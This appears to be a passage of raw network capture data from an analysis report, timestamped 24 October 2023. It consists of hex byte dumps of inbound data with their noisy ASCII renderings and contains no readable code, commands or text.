                                                                                                    2023-10-24 04:55:21 UTC176INData Raw: bc 1c f4 60 81 42 7b 43 3d f0 02 41 ba d0 85 4a 5d f3 5b 83 2e 92 54 39 53 a4 da d2 b2 60 f0 25 d4 ce c5 44 69 ab e7 90 46 c4 41 36 6d 4f 50 14 cd fb 56 5f 6d 5d 04 56 fd 3c 2e db ae 73 23 46 0b 8f a8 0e cc 95 eb e8 66 4a 65 0a 3e f1 a5 7a 42 61 8e 78 91 6d ff d5 97 72 56 83 4b 9b 1a 17 96 bd 3e db be ab b2 12 4a 74 67 c7 05 82 24 b4 f7 09 4d 5a 9f 96 c7 82 2d f0 a6 4c b5 ac c9 8f b6 0d 2c 5c b7 46 13 2f 48 29 99 cc d5 d9 8b 52 f9 c5 64 ae 4d ce 41 fd e6 90 dc e6 29 63 7d 80 a7 0b 53 84 f1 58 fa 2b d0 9c 74 40 66 7e 2e d8 48 bc f5 a5 5c 9a 96 53 5c bc 2e 1b d6 8b b6 94 7a d9 fa 75 99 99 09 f9 68 2d 29 7d 9a 7c 29 55 40 41 2a 58 55 5d d6 eb e7 60 01 70 01 f1 9b c0 02 e5 6d 42 d5 e2 bc 9c 2c 98 8d da e7 e6 c7 31 0b 93 32 f2 f3 93 0a 14 1c df 4f 15 99 9c 94
                                                                                                    Data Ascii: `B{C=AJ][.T9S`%DiFA6mOPV_m]V<.s#FfJe>zBaxmrVK>Jtg$MZ-L,\F/H)RdMA)c}SX+t@f~.H\S\.zuh-)}|)U@A*XU]`pmB,12O
                                                                                                    2023-10-24 04:55:21 UTC184INData Raw: 32 c7 39 ce 4c 84 ff 25 86 a4 1b 36 c2 f7 e6 47 26 14 0f e5 34 0d 0e 1b a3 21 a8 f4 81 ae 8f fa 34 0a 71 de ee 9d 42 f0 0a 18 63 a1 99 4c d4 91 60 25 65 60 0c 98 15 2f 04 96 8d 0f d5 fe eb c9 55 94 0b 68 cd 52 dc 4a 56 51 7e c6 1e d2 9f ef c1 aa 32 6f 62 db 16 c9 92 ab f7 52 00 12 5a 34 04 aa ef 51 97 5a 8e 0b e1 ed e3 e2 dc 56 f5 c8 c2 35 77 db 57 42 98 3b 62 d2 2f bb 8a cc 64 0d af 16 de 51 9a d3 aa fc 25 3f b2 19 40 b5 fd 2b cf 85 dd 9a bb 45 77 67 e5 c1 db 40 7f 2b ec 7b 33 23 9a 1b 79 68 e8 37 7c 78 6a 5f 3c 3a f8 fa 84 93 45 0d b2 98 95 83 cf c2 ec 45 f1 f3 5f 3e 7e 6d dc f1 82 dd 19 09 d9 85 7d 06 6a c1 77 dc da 38 84 00 3a a6 3f e6 f0 14 8c bb 29 62 c9 36 ec 04 f4 67 33 9f 0f e7 51 db fb cf 9a 7d 64 f3 b0 2d 00 57 be 71 1b 4f 40 ce bf e2 17 7f d2
                                                                                                    Data Ascii: 29L%6G&4!4qBcL`%e`/UhRJVQ~2obRZ4QZV5wWB;b/dQ%?@+Ewg@+{3#yh7|xj_<:EE_>~m}jw8:?)b6g3Q}d-WqO@
                                                                                                    2023-10-24 04:55:21 UTC192INData Raw: bf 72 6c 40 12 5c 65 4f 93 e7 c5 79 f3 db 17 03 58 66 4f 9b df 3a bf b5 ee a5 06 57 fb d1 fb 29 6d 5b 5e 3c 1d 19 03 57 69 6f af db 33 73 4e d3 6c 12 9c 85 99 0b 1b e6 34 78 1a 5b fd 2d a7 22 89 c6 f5 0d c7 06 4c 80 ab 6c 6d f2 ec 98 37 af 7d 21 7f f6 96 30 f1 76 15 37 1e e2 b9 ed 15 2e 41 02 6a 77 cb b0 27 5f 3a c8 57 d3 03 08 29 d7 c5 28 79 16 91 96 53 4a c9 89 5c 81 9a ce 24 a5 dc a5 60 6c 2e 18 7b 02 8c 8d 01 63 49 60 8c 00 63 43 84 5a 4e 23 b7 51 f9 48 e4 21 d8 13 a6 00 ec 42 61 dc a9 3e 29 dc 38 b0 fb 89 5f 14 c7 1f f9 39 8e 48 00 fb 9b fc cf 1c fe 57 bf 08 79 49 60 cf c5 9f e4 0a c8 44 40 25 29 fb 57 32 47 7f 1d 4d 8d 00 54 27 39 90 c7 3f 7e 37 99 19 05 68 23 ee b3 02 c1 c9 fb b1 58 02 a0 b5 84 83 41 1a 02 2b f3 e1 ca f1 ec ca 02 b8 72 22 bb 32 17
                                                                                                    Data Ascii: rl@\eOyXfO:W)m[^<Wio3sNl4x[-"Llm7}!0v7.Ajw'_:W)(ySJ\$`l.{cI`cCZN#QH!Ba>)8_9HWyI`D@%)W2GMT'9?~7h#XA+r"2
                                                                                                    2023-10-24 04:55:21 UTC199INData Raw: 35 b1 62 99 b6 97 d8 ac 88 ed 85 0e 4f fc 47 2b 64 bd 44 78 85 d9 0e 9b c3 e8 f1 6f 84 fe 67 c8 e1 fa 3f d7 5b 6c 31 3e 47 57 5e c5 ea 16 70 f7 53 96 6a 7a f1 3f c7 ae f6 d9 1c ba ae 13 95 bf b8 37 19 1f 03 63 b8 c6 8a b2 8a 1a e4 03 75 2e 90 f7 12 a5 15 a8 5d 25 ee 1a 7f c8 07 2a 7b 2e 83 79 f8 44 c5 e6 d8 83 35 da 34 f3 c1 92 2e db e5 d1 65 0a f2 8a 54 c3 24 2d 95 e1 07 57 04 6d 97 e7 14 e4 a2 ff 22 d6 11 58 2f c5 2e 78 bb f2 9b 06 f8 ff 58 ac 43 b1 41 4d 4d dc 22 c5 66 6d 55 92 c3 76 86 f2 09 a1 56 f5 51 89 0c f9 0f 60 4e 0c f4 1a 0c 5a c7 9e 5a 16 7a 0a e3 fe 7d b5 92 37 16 c0 4c 29 a0 bf 18 48 3f 14 87 18 0f fe 2b 96 c1 33 08 a3 23 d0 af 02 ad 93 d8 8c 35 06 bb 4b 66 f7 39 fc 60 1e cc de 79 0a cc 4b 92 a9 ac 55 86 ba ea 6a e8 31 74 02 4a dc b4 3b 0b
                                                                                                    Data Ascii: 5bOG+dDxog?[l1>GW^pSjz?7cu.]%*{.yD54.eT$-Wm"X/.xXCAMM"fmUvVQ`NZZz}7L)H?+3#5Kf9`yKUj1tJ;
                                                                                                    2023-10-24 04:55:21 UTC207INData Raw: 66 71 92 8f 77 f0 9e 72 77 a5 49 b6 1b ac 72 b4 46 ae 4b 8c 11 40 90 16 f3 d7 f1 3e ee 8a 0a de 97 cb 32 81 66 37 bb fe 55 dd f3 46 68 70 6a 85 09 fb 2c a2 dd 93 fb 88 98 7c 51 61 1e 31 f9 b0 09 59 13 de 8b 4c 5f 43 88 e2 75 6a 45 52 9f d8 67 cf da 27 b1 0f a2 1f eb 1f 1e 90 cd d1 39 be b0 fc 89 bd 30 ed 29 ec 1d 96 9e 06 12 ce 77 66 e4 f2 cc 0d a6 dd 78 a0 42 8a ef 58 f7 97 62 27 e3 36 9a df 06 65 95 f8 5f 63 27 7b aa 2c f7 4c f3 66 05 7d 00 9e 9d d8 c0 f3 c1 ed 75 7c 84 c3 7b f3 5f 8f 9d a0 3d 53 91 10 cc 76 a2 35 37 e6 e1 21 4a a2 ac 26 89 5c 96 c9 69 88 d5 f9 a5 88 42 22 e6 d5 75 7c e4 62 4d 15 ef c9 d7 56 06 32 2b d0 de 27 64 ff 48 ef af 4c 2c 31 71 f6 bb f8 a6 35 4f 79 e8 49 c9 89 4a 33 4b d8 fd 13 3d ca 75 71 97 99 73 a2 58 30 5d f8 cb ea a7 51 d5
                                                                                                    Data Ascii: fqwrwIrFK@>2f7UFhpj,|Qa1YL_CujERg'90)wfxBXb'6e_c'{,Lf}u|{_=Sv57!J&\iB"u|bMV2+'dHL,1q5OyIJ3K=uqsX0]Q
                                                                                                    2023-10-24 04:55:21 UTC215INData Raw: ee 03 b8 d5 1f d3 84 af 7f c7 b3 d8 13 e1 08 42 23 12 86 f8 80 ad d1 74 05 d6 23 f2 07 1a d9 38 bc de e7 75 f7 9d e7 90 ee ae 88 d7 90 c8 bb 2f 29 1b 01 f6 e0 38 e0 8d 99 60 23 2e b0 59 02 54 73 94 20 0f a4 ee 8c 4d bf e7 70 26 96 5b e9 2e 31 e0 35 0f 40 5f d3 07 08 69 64 1f 9d b6 fe 4d 44 33 4d ee b0 82 ef f4 c7 a8 24 ce 1b 7f 1c 6c a1 c6 51 c0 75 3d 5d 02 2e 82 7a 15 da 79 1f 66 90 3d 63 18 f3 5d 18 c1 82 43 1c 87 d5 9e d8 dc ea 68 93 75 84 65 ef be 3b e9 a3 87 6f 4d 8d 5b 83 62 ae 1c 7e d9 36 04 2c fa 53 ea 11 40 53 8d 83 00 43 23 f5 06 59 42 9a c9 12 ae 5d 16 df 6e 1e b4 4b 80 76 1b 17 78 96 7a 01 5d 72 fa 83 45 20 15 73 fc 2c 85 f9 6e 59 38 ba d0 03 c6 32 0e 8d 59 d0 3d 83 12 10 c0 f7 c3 25 4a 0e 69 85 dd 54 08 ba c7 ff 01 48 6b ec 5d c2 19 e1 1c fd
                                                                                                    Data Ascii: B#t#8u/)8`#.YTs Mp&[.15@_idMD3M$lQu=].zyf=c]Chue;oM[b~6,S@SC#YB]nKvxz]rE s,nY82Y=%JiTHk]
                                                                                                    2023-10-24 04:55:21 UTC223INData Raw: 6c 4b ff bb 55 39 c0 26 3b d7 5c 40 b2 f3 6b 1c ce 9a 77 c4 9c d0 60 bd 9e 67 70 a2 33 bb ab 0b e9 55 7e 37 4e bc 84 a4 e3 df d0 a8 ba 9f 6f 86 4c 17 7a cb b9 6f d1 5b 9e 34 40 5b 60 cd 60 5b d4 60 c8 0f 10 35 40 f3 a0 9a 04 47 f6 e7 82 dc f8 f2 3c cd 58 8e e4 71 72 63 90 4d 6e 9c bb 88 e4 46 2a 54 7c 34 12 f4 2e ff b6 83 32 90 02 1f 7f 07 d1 78 39 27 05 ec df 7d fd 47 f4 dd f9 e8 bb c2 66 2a 58 3f bc fd d0 42 88 41 5d 3a 0d 31 f8 45 5c 0c ca 3e cb 3a b4 cb bc a0 6f 0a a3 0b c4 8c 01 9d a6 71 20 87 12 5b 40 0e 8d e7 e4 90 9d 6a ea 6f 11 d5 ae 21 e9 d8 76 70 04 c4 3c 72 b1 de 5b c7 a0 e2 23 58 08 33 0a 86 d8 d2 7b df c2 58 04 84 eb 58 c6 c2 58 5e a6 80 06 7d 41 3c 0d 46 59 20 72 f2 2b ee 4a 83 01 88 4f 6f d7 93 24 fa ee 79 2e 92 15 e0 35 d6 0c b2 13 b2 0f
                                                                                                    Data Ascii: lKU9&;\@kw`gp3U~7NoLzo[4@[``[`5@G<XqrcMnF*T|4.2x9'}Gf*X?BA]:1E\>:oq [@jo!vp<r[#X3{XXX^}A<FY r+JOo$y.5
                                                                                                    2023-10-24 04:55:21 UTC231INData Raw: 47 90 8d de 89 f8 c0 f7 6c 3c 21 38 2f a5 3f 45 76 fb 5b e8 5a d4 f7 72 f6 5d 64 b7 bf d1 28 b5 bd 2f 56 a1 cb 31 56 6c d3 15 cd 5c ba 74 d5 fa 79 ca 1d ba 94 e2 22 ee 1b 74 8c b4 26 53 57 8a 2c a3 69 8b 16 2d 5f 33 5b 56 da 94 5d 90 bf 17 7d 4d 3b 07 b8 29 d4 b6 1b 93 75 fa 72 7b 0e 8d c3 39 0b 86 ce 78 c3 97 1d 6b 53 01 f6 bc b9 26 38 b9 35 e0 89 65 1b 17 5f 05 fc 55 69 70 17 fb c4 da 67 08 e3 44 1e a3 d4 42 58 d9 17 7c 02 16 0b b0 b5 4a 26 ba 15 ba ca 27 26 19 2f 03 da a6 82 31 c7 07 5b 25 22 9f ac 67 90 fc 1b 08 6f d9 62 7f 0b fa 37 c0 1c 4f 1f dc f0 02 dd 24 e3 f0 4d 01 47 b6 3b 0e c9 b5 e7 bc de 5e c8 b0 ab e5 42 e3 6c d7 b7 74 86 bc 7c 48 3a 9c 43 3a 45 df 0d b4 24 30 2b 2e b5 8f 7f d9 83 92 6c aa ff e7 a1 7d 02 56 37 ce b4 5b 50 25 ec d6 50 49 4b
                                                                                                    Data Ascii: Gl<!8/?Ev[Zr]d(/V1Vl\ty"t&SW,i-_3[V]}M;)ur{9xkS&85e_UipgDBX|J&'&/1[%"gob7O$MG;^Blt|H:C:E$0+.l}V7[P%PIK
                                                                                                    2023-10-24 04:55:21 UTC238INData Raw: e5 aa 62 91 55 a0 a1 7a e5 1a d2 59 1d f8 4e 1a 54 a7 0e 32 8f 1e 9a 07 f5 cf 15 b6 35 2a db a1 15 f4 4d 2a 82 35 7a 37 0e ad d1 cf bc d4 73 ec 5f af cd 4b ce 98 37 61 d6 14 01 e0 0e 66 0c 6a bf 0e bb f6 6c 8a 6b bd ca a9 8e 70 3a 6b d2 92 2f cd 0a 2f 9f 67 c1 f2 40 7a 3f cb bb 33 e4 e9 43 52 ef f6 cc 40 40 21 65 04 9b c5 1d ca e1 9d b9 c3 7a f7 ca f8 2a 10 5d b2 a3 0a 44 32 6c ad dc bf 21 e4 6b 8d 2f e6 39 fd c0 9e 40 61 63 18 87 04 2c 3a a3 f2 66 90 1d 91 3e 14 ea 19 5a 7e 09 10 1c fc 6a e4 d3 2a 6f 87 ae 6d c8 e2 75 ad 48 06 95 17 83 6f 0b 12 61 ef f7 2e 43 7b df 73 ff 13 de 4c 33 65 de e2 e3 33 9b 52 fb 42 c5 cc f0 1d 02 2a 5e e3 17 de 9e 8b 36 1c 87 4f c7 51 72 46 29 c1 2c be ea d8 1f df a7 c0 fe 18 f1 25 74 19 f1 88 90 02 7a 62 80 8d 6a 41 65 50 d3
                                                                                                    Data Ascii: bUzYNT25*M*5z7s_K7afjlkp:k//g@z?3CR@@!ez*]D2l!k/9@ac,:f>Z~j*omuHoa.C{sL3e3RB*^6OQrF),%tzbjAeP
                                                                                                    2023-10-24 04:55:21 UTC246INData Raw: 99 4b 51 25 be 52 b0 e7 43 36 18 ed 79 ad cd f5 c9 24 5b 58 0f 78 82 12 bb 9e be 04 51 74 c1 fa f8 24 34 bb f6 01 1b bb ac 1e e9 3b ed ef c5 85 d4 d7 7c 34 cf 3e 50 84 ac e9 a6 f3 79 dd 2b 06 7e 05 35 44 e5 2a 96 f5 f5 cf 7a 02 55 8d 91 d2 03 a9 9f 23 9b 5c 13 68 56 89 34 b6 90 af 44 b2 d9 d1 4d 82 2c e2 28 19 e4 4c 80 76 14 b0 b2 a7 d7 23 9d 13 1c b2 30 34 a2 f2 de 16 65 37 b8 4f 6e 5f 68 ca 2f ee fc a2 a6 13 29 dd 5c 5b 5d 29 46 96 6e e3 1a 09 53 d0 b7 b0 ba a8 6f 2a d8 df 90 f1 8e 84 6d 78 78 85 6f 7b 87 d3 ce 84 64 51 69 c4 1b 90 2f ea c6 cb 8b 76 7a 37 f1 c2 52 b5 8d ed 30 9a 15 85 17 85 5a 97 fb 74 aa e8 9d 08 3e 43 c8 54 09 b3 b8 c8 ff df e2 b0 0e 65 be 8e 0e 97 45 fc b3 56 48 b7 bb f2 2b 3d e5 23 b3 5c e2 37 d6 f2 b9 c4 e5 03 21 23 0f c7 46 06 0f
                                                                                                    Data Ascii: KQ%RC6y$[XxQt$4;|4>Py+~5D*zU#\hV4DM,(Lv#04e7On_h/)\[])FnSo*mxxo{dQi/vz7R0Zt>CTeEVH+=#\7!#F
                                                                                                    2023-10-24 04:55:21 UTC254INData Raw: 1d ee 3a e6 c7 15 80 c7 cd fb f2 b4 6b c5 05 0b 8f 1b e6 c5 e5 f5 fb 72 fe ac b7 a4 c7 9f 9a 57 ac 02 dc af 92 ed ce 1b f8 4e 40 5f 05 de 6a 0d 93 cd cd 37 33 43 1b 9b 9e 43 33 da 06 93 ff 92 5f ad 24 ed 6f f8 30 bb d0 6f 4c 2d f6 5f 22 6a 94 e4 70 88 03 23 9b fc ba fe cb 9e 1a 0d 5a 73 7f ce fe b2 8a bc 5a e3 cb 3c 69 30 f0 98 40 af fe 45 96 58 86 de ec 89 2c 89 bb 51 c2 38 8a b6 42 f6 12 6a 47 e4 be a0 63 b5 46 ad 02 d1 5f 61 77 4b 94 67 35 74 0f f4 84 4c 65 8a f5 91 7b ab 7c 78 e6 6d b9 da 70 1f 0f d1 b2 1a 5f a4 4b 08 89 bb c6 fc 2e 06 22 e0 ef 4b f2 eb f1 2d c0 ee 5a 1c f3 7d 7a 1e 4b 49 bf cb fe 62 7f 89 84 9c d9 e0 cb 06 89 a5 92 fc 0b 1a 5a 83 da 9d ac c3 31 d0 f6 35 38 06 3a f2 0a 96 a6 a8 4b 38 56 ba eb 22 8e 81 3e a9 c7 ed c6 d5 e1 76 ab ae e2
                                                                                                    Data Ascii: :krWN@_j73CC3_$o0oL-_"jp#ZsZ<i0@EX,Q8BjGcF_awKg5tLe{|xmp_K."K-Z}zKIbZ158:K8V">v
                                                                                                    2023-10-24 04:55:21 UTC262INData Raw: 74 16 75 ef be 3f c7 ce 89 8e 09 89 d6 26 b7 b9 0a 79 c8 12 b3 cd eb c6 66 51 ff be c6 b3 b2 f7 3a b4 f2 ac 8a 6a 87 9e a5 31 22 95 a9 c2 03 b4 6d 9b 75 45 8f 86 5b e2 79 f8 92 07 ef f1 08 34 da 98 cc ec 85 31 99 29 02 b2 65 77 e4 f5 5d 95 aa da ac 99 1a 04 fe 33 65 8e ed 15 c4 d4 3d 6e 0b 87 ea 26 d2 93 6d e2 50 c1 bc b4 a8 a7 0b a4 66 3e 6a 0d 6d 0b 70 8f ae d3 9a 36 d1 b6 64 43 df 00 8d ee 61 ca 3d c7 18 42 c7 1e 34 e3 14 90 58 ae 2a cb cc e0 06 fc a5 22 d9 e0 98 f8 8c b6 56 f0 0a bf 82 ee 6a 2d cf 39 84 eb a3 2e 3e f0 a1 5d c2 93 93 78 2c 24 03 2e bb c5 78 3d c0 a7 36 c7 74 9a 47 d9 3e f6 e7 64 b8 3e ca b2 12 c4 62 77 bb 3e 7c ef 95 95 20 13 09 d9 03 64 7f 7d 92 32 57 66 b6 25 b1 2d 90 60 fc a5 bd 1e fb b1 3d 71 7d 94 05 9a 5a b3 1e 08 ac 15 cc 5c 73
                                                                                                    Data Ascii: tu?&yfQ:j1"muE[y41)ew]3e=n&mPf>jmp6dCa=B4X*"Vj-9.>]x,$.x=6tG>d>bw>| d}2Wf%-`=q}Z\s
                                                                                                    2023-10-24 04:55:21 UTC270INData Raw: 14 f0 43 be 11 2a ec 7d 81 67 67 f7 72 78 2d d7 6a 42 cd bd fd 9d 6f 53 02 83 d0 ef 09 e9 df 85 4a 5a 44 78 9e da 1d cf 54 89 69 0b fe 9f bb 00 e3 b6 8b 2f d9 f9 9b c0 cf 0b 34 84 dc d8 0c 3a 3e 0e 6c db 2d 84 b3 15 f5 6f 09 58 e1 47 28 5e 95 f4 0a 66 7e 1c e6 81 84 db 29 00 bf 87 d5 ec 71 6c 0a d1 10 1e 81 e7 d6 ce 7e 5d 74 c4 5f ee 37 5f 50 49 fb 3c 77 93 77 08 d0 4a a3 d5 1d b5 fe c7 de 10 56 c1 0a ba 49 be e6 1e af 13 09 6a 22 4c 8f b2 1b 1c 04 15 e2 16 16 5d 97 d0 78 a9 2a d6 8a e7 fa f6 ed 61 78 ae 60 06 cf b5 70 e9 15 ad d2 df 6d e1 cd b5 62 14 3e ae 33 6f a4 d3 18 e7 67 45 83 c7 fc d9 41 f0 17 8a fc 17 a6 fa 12 39 ee a9 4f 0d dc 5e 5c 76 8d e1 89 29 51 df ed 4c a6 85 a0 21 34 17 7d 07 37 55 f0 29 4d 67 dd ac 94 4a 79 fa e1 d0 36 96 f4 50 88 d3 7c
                                                                                                    Data Ascii: C*}ggrx-jBoSJZDxTi/4:>l-oXG(^f~)ql~]t_7_PI<wwJVIj"L]x*ax`pmb>3ogEA9O^\v)QL!4}7U)MgJy6P|
                                                                                                    2023-10-24 04:55:21 UTC277INData Raw: 18 6c c2 2e c7 02 92 ef 69 7a 58 15 e2 b4 6c c1 88 ba 98 0e ac c9 1c aa 3f ba 38 9f a9 3f ca 8d bd 63 ea 8b eb 1a 88 46 bf ec 3a 89 c8 79 cd 7d 11 0d 7e d5 7a 0f db 06 1b ba bc f1 35 90 61 ee f0 5e 36 c6 c8 9c 0a 6d 31 b2 a5 3f eb 7b 9d fd 66 f1 d9 cd 1e c7 c6 1b 42 aa b2 c8 8d d5 ee 1d 0a 11 eb bd 78 5f ae 83 26 96 23 c4 d8 66 be d4 f1 5e 0d 57 a4 39 2a e7 55 47 e0 2d 6d 9d 72 3e 4f 57 c8 35 ab 42 5d bf ad 80 11 dd 87 35 ca 01 75 65 97 43 ee 85 84 45 cb b5 b9 02 b3 b9 db de 20 b7 ae 32 5a 37 6b e6 4b 5a 77 23 46 35 6c d8 05 a7 dc 42 db 4d 8e ed b3 41 b2 3e 31 94 79 b7 29 d8 c6 9a 31 07 e8 b8 ae 25 3f a1 bf 35 55 44 38 11 42 fd ec 7a eb c3 52 bb de 8a 36 3d b2 24 39 11 bd 9a 2b b3 84 63 d6 2d 56 0c f3 0c fe db 47 be 02 44 25 3e b2 c7 00 3e 2a 50 82 e4 77
                                                                                                    Data Ascii: l.izXl?8?cF:y}~z5a^6m1?{fBx_&#f^W9*UG-mr>OW5B]5ueCE 2Z7kKZw#F5lBMA>1y)1%?5UD8BzR6=$9+c-VGD%>>*Pw
                                                                                                    2023-10-24 04:55:21 UTC285INData Raw: c9 9b 97 38 37 d1 af fa e6 ec 07 ea 26 1a a6 d0 fb 59 7e e5 0f b5 4f cc ef cc 01 7e a7 29 59 2d 6b 50 49 6d 62 fe 56 97 e6 7e 9e 6f 98 b7 cd 3d dd c5 b0 f3 7c 55 1e 4f fc 7c 55 13 ec 70 98 b3 31 5b 78 b9 2c fb 6d a1 fe 72 be e9 0d b1 fa ac f6 b2 e3 fa 2b 52 19 11 b5 90 7e 1e de 9a f4 e7 14 86 88 49 ea 2e f4 d9 79 13 34 d2 ea 60 95 d6 53 ef cb f0 7c 41 c8 15 75 d4 b4 ca 73 ca bc 8a d5 b1 e3 7d ff 25 01 5d 56 e8 dd c6 78 91 93 c7 8b 02 d9 d6 53 92 e9 de 86 f9 cf 6b 65 65 2f 26 e8 ee 1a e4 ce ed a0 a8 fa a5 fe 4a e5 53 89 51 c7 35 7e ba c0 1a e3 fb 13 fd d4 2b 05 9a f4 a3 92 14 55 d6 5a c7 ea 66 59 f6 c6 1b af bd 6e f1 b6 b1 cb 79 fa 36 c2 c2 79 0a 1a 3b 4f e0 70 69 12 c1 79 b2 e5 4a 56 5c b5 c7 45 f4 1c c2 e2 75 77 f3 39 16 ae a4 3e 54 3c 9c aa c7 fb 14 e1
                                                                                                    Data Ascii: 87&Y~O~)Y-kPImbV~o=|UO|Up1[x,mr+R~I.y4`S|Aus}%]VxSkee/&JSQ5~+UZfYny6y;OpiyJV\Euw9>T<
                                                                                                    2023-10-24 04:55:21 UTC293INData Raw: 23 06 4c a6 d0 00 fe 52 b1 72 1b 96 ca cb 3e 3c 1a 4b 25 f2 af 7c 01 e0 c0 d0 f9 04 3c 3d 73 fc 9d c3 7c b8 3c 72 cd 14 d6 87 8e 87 0e ec e8 b3 68 c7 24 35 7b 91 45 71 42 47 1e 8b 07 9a 3d 12 d9 79 1a 90 1d e8 68 57 8c 3e ab 1d 16 69 08 33 28 3f 5b 90 be 8e b1 88 cc a3 70 ef 86 8d df a4 f2 ba 46 0b 71 8f e6 02 19 74 20 9e e0 89 b2 fc 4e 97 3e fd fe 1d 9b 6d b4 32 ab 7e c0 fa a3 0b f1 72 ec b9 47 68 65 22 4e da d1 ca e8 73 14 a6 c2 a0 d9 19 8a 4a e9 8c e6 56 69 82 4c 93 29 d5 e7 f9 cf cf 0f 0a d8 7d 82 f8 8d c2 7a bf f1 e8 79 d8 b9 b6 b1 f6 af ad c2 db fe b5 3d 82 e7 71 78 30 c7 2e cf a3 76 63 0a af eb 90 27 db 0e cf 43 e7 c9 7d 4c 9e 47 1f da 96 11 67 6d b5 2d b7 4f da d7 b6 fc 70 fa f1 b5 2d 4d ff 63 4f db b2 e3 6c 5f da 96 ee d3 84 b6 e5 d6 31 d0 b6 ac
                                                                                                    Data Ascii: #LRr><K%|<=s|<rh$5{EqBG=yhW>i3(?[pFqt N>m2~rGhe"NsJViL)}zy=qx0.vc'C}LGgm-Op-McOl_1
                                                                                                    2023-10-24 04:55:21 UTC301INData Raw: bb bf c0 a8 f6 d0 47 95 3a 94 3e aa 35 3b 61 54 12 fa a8 6c ee 8b 29 a5 ab fa a7 12 e9 2b 57 f4 c3 ac bf bb 62 17 54 8c 0b de b9 33 c2 92 ff a2 b5 60 0e cd f0 8f 17 39 8d fd 08 ef 84 aa 4e c3 88 f3 e1 09 bc 2e de 79 be c8 78 1b ad da 21 5a d5 03 a7 a3 d5 e8 dd 9f e1 69 25 2f a1 3d ad ee 10 fa d3 ba f5 01 3c ad d2 35 b4 a7 65 33 5f 0c 49 bf 37 2e ba 53 73 69 5d d0 8c f3 86 cc d0 fa 24 85 26 55 ae 0f b2 8e af f5 23 62 7c 15 11 bd c7 57 b5 93 1a 9f 74 04 1a df 12 9b f1 dd 7b 5a 44 8e cf 71 31 6d 7c 0d a1 f4 f1 cd c5 e3 eb 78 bf af f1 59 ef ee dc 1d c4 7c e6 0e ef 3d 9f 3d b7 53 f3 f9 01 cc e7 5b 67 7b cc e7 43 f4 11 28 87 d2 47 70 6c 3b ae ff be 3f 90 f9 7c ec 43 62 3e 57 47 f4 9e cf 25 3b a8 f9 3c 7d 18 9a cf 99 e7 7a cc e7 37 5f a3 cd 9c ba 30 fa cc 99 b5
                                                                                                    Data Ascii: G:>5;aTl)+WbT3`9N.yx!Zi%/=<5e3_I7.Ssi]$&U#b|Wt{ZDq1m|xY|==S[g{C(Gpl;?|Cb>WG%;<}z7_0
                                                                                                    2023-10-24 04:55:21 UTC309INData Raw: 03 3b 73 4f 4a bb 34 83 4e e9 8e c5 74 e4 8f 19 21 cc ec a0 76 77 ee 88 be 6b e6 a1 76 dd 00 bf 5f 77 60 e0 50 ba f0 6e dc 09 7c b8 ae 69 27 21 82 26 4b 82 19 38 20 66 3a 70 6d eb e8 83 bb d3 c7 37 e7 b5 93 bb 3a 4a 27 75 25 b7 9e d4 7e db ae 3f 2e ee 2c b8 d6 aa 39 22 39 95 7b bd 6b a7 f0 54 8c ab fd e0 c4 33 d3 5b ba f1 ce 56 a2 43 71 97 e4 b4 0a 6f cb ee 92 b6 cb e3 ee 8a 71 b4 15 8d ef c8 fd a1 33 b9 b5 55 fb 43 1b 78 b7 ab 60 d0 49 f0 ae 2c 6f fb b8 d4 bb a1 27 18 c9 63 1c 47 f9 3d c6 c4 40 8f b1 c7 2e 9c 65 f9 fe 0a c7 f7 c0 b2 8f 11 20 cb 8e f4 06 ab 9b ce fb 74 d3 65 4e 37 d1 1f 0e f9 88 19 2b d8 fd ce 14 c2 a7 9b ce 71 ba 89 f8 f4 8e 4b 83 bf 8d 87 d2 23 e1 7a 2f 73 f6 03 5a 76 64 e3 6f a6 fd e8 5e 0d ec 47 e7 ad e1 ec 47 7a d2 cd b3 1f 2b d6 01
                                                                                                    Data Ascii: ;sOJ4Nt!vwkv_w`Pn|i'!&K8 f:pm7:J'u%~?.,9"9{kT3[VCqoq3UCx`I,o'cG=@.e teN7+qK#z/sZvdo^GGz+
                                                                                                    2023-10-24 04:55:21 UTC317INData Raw: c8 43 df 95 e1 27 c1 bb 71 8a 7a 7b b5 c3 ed 8f 7a 2d 2f 46 46 71 c8 6b 93 21 fa e6 8f a8 54 a2 8c 89 2a 32 31 c7 69 35 d8 9c 85 06 9b 99 3b 55 48 20 c5 f1 f6 3f 45 46 a8 66 0e 44 11 38 1b e7 59 21 27 e6 91 bb 45 3a 81 54 d5 e8 34 b9 bc 41 68 45 fd 73 a1 68 05 cd f9 16 ec ba 84 a0 97 39 f8 a7 02 10 23 a2 b9 f1 30 37 29 0d ad 55 0f 0f b1 be 0a 88 11 55 8d d5 a6 7d 0c 9d 24 d8 97 0d fc ce 78 ff f9 2f 9c e5 3c 91 2a 5a 45 4a 8a 4d 7b 6b 7d bb 2a e4 ef 2a 45 6e a6 df 18 2f 13 51 f9 06 a3 25 d2 0e 3e ca ee 60 5c ae 35 bb de ea da 87 d0 a8 f2 68 25 21 2d a9 73 b0 be 1e c2 87 30 fe 7c 69 e4 05 f9 10 11 4c a4 c3 8f 8a 34 74 12 42 a3 74 c0 1e f9 90 4f 49 90 74 5f 05 11 bd 1f f9 a4 37 5c dd 0e d6 39 56 d9 e0 41 b1 06 94 b2 ad 82 47 26 29 40 18 50 6b 33 db 22 71 6c
                                                                                                    Data Ascii: C'qz{z-/FFqk!T*21i5;UH ?EFfD8Y!'E:T4AhEsh9#07)UU}$x/<*ZEJM{k}**En/Q%>`\5h%!-s0|iL4tBtOIt_7\9VAG&)@Pk3"ql
                                                                                                    2023-10-24 04:55:21 UTC324INData Raw: 04 9a ec 60 ac e5 72 22 aa b7 ba c1 d5 c8 84 3c 99 20 10 61 70 67 74 f4 5d 99 72 91 44 d1 0c 74 29 2f a3 8c a7 e1 b8 c8 0b e5 00 6d e0 b8 89 e6 ee 51 5f 87 6a 1e c7 66 f3 7a 40 45 e2 67 3a d3 69 0f f4 ae 81 d4 16 55 ba 7a aa a7 56 8a 86 2b d4 c0 bf b2 58 6c 40 56 d1 48 31 be ac b2 eb e2 8b 4d d7 0b 08 b9 d2 77 ff 15 5c bf 10 be ca 40 7c 85 72 1c 6e a7 e6 ea 42 2b 18 f9 bb 20 5a 84 6f 50 07 54 30 c2 bf 42 af 8a 27 e7 b0 82 d1 a9 0c 5b c1 c8 a7 43 fe 78 60 05 63 b7 2e 5c 05 63 ef b2 a0 11 9e 57 44 aa 60 ec 8d 87 22 54 30 6a 64 91 2a 18 79 92 2c 86 1c c6 af 60 3c ac 0b 57 c1 18 a4 23 16 12 e3 b4 21 15 8c fc 2f 33 77 08 6f 53 85 54 30 